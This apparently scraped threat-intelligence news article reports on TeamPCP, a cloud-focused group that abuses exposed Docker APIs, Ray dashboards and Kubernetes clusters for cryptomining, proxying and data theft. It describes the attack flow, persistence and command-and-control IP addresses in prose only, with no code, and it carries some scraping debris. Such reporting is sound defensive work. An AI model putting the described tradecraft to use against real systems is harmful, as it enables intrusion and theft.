In December 2025, TeamPCP—also referred to as PCPcat, ShellForce, and DeadCatx3—emerged as a highly skilled cloud-native threat actor that targeted vulnerabilities in React2Shell, Kubernetes clusters, Ray dashboards, Redis servers, and Docker APIs This article explores compromised servers used. . The group started a massive campaign with the goal of creating a distributed proxy and scanning infrastructure at scale, then compromising servers to mine cryptocurrency, exfiltrate data, use ransomware, and engage in extortion.

While members publicly celebrated stolen data across Telegram channels, infrastructure remained mostly quiet after activity peaked sharply around Christmas Day 2025. Operational scale and integration, rather than technical innovation, are what distinguish TeamPCP. The campaign turns exposed infrastructure into a self-propagating criminal ecosystem by weaponizing well-documented vulnerabilities into a cloud-native exploitation platform. Large-scale automation, not creative exploits, is the strength.

Compromised servers are used for data hosting, command-and-control relays, proxy networks, cryptomining, and scanning. 185 compromised servers with attacker-deployed containers running standard command patterns were found by Flare researchers, giving them a clear picture of TeamPCP tradecraft. Investigators discovered secondary infrastructure at 44.252.85.168, which was seen on three more victim servers, in addition to the primary command-and-control node at 67.217.57.240, which was found on 182 compromised hosts.

Multiple control endpoints indicate early-stage infrastructure migration or operational redundancy. Most of the compromised data originates from Western nations and targets businesses in the human resources, finance, and e-commerce sectors. The majority of victims are cloud infrastructure, with AWS and Azure hosting 36% and 61% of compromised servers, respectively, making up 97% of the impacted infrastructure.

Attack Mechanism and Worm-Like Propagation TeamPCP operations start with automated scanning to find exposed Ray dashboards and Docker APIs across large IP ranges. The schematic flow of PCPcat operation (Source: Flare) The group uses unauthenticated management APIs to remotely deploy malicious containers or jobs after access has been verified. They start a host-networked, self-restarting container that retrieves and runs remote scripts after pulling an Alpine image for Docker.

They submit jobs to Ray that run bootstrap payloads encoded with base64. The campaign's operational core is the proxy.sh script, which installs peer-to-peer tools, proxy utilities, tunneling capabilities, and other scanners that continuously scan the internet for servers that could be compromised. The script effectively transforms each compromised host into a self-maintaining scanning and relay node by registering multiple system services to guarantee long-term persistence.

The script also drops cluster-specific secondary payloads and branches into a different execution path when Kubernetes environments are detected, suggesting that it is specifically designed to target cloud-native targets rather than generic Linux malware., LinkedIn, and X to Get More Instant Updates, Set ZeroOwl as a Preferred Source in Google.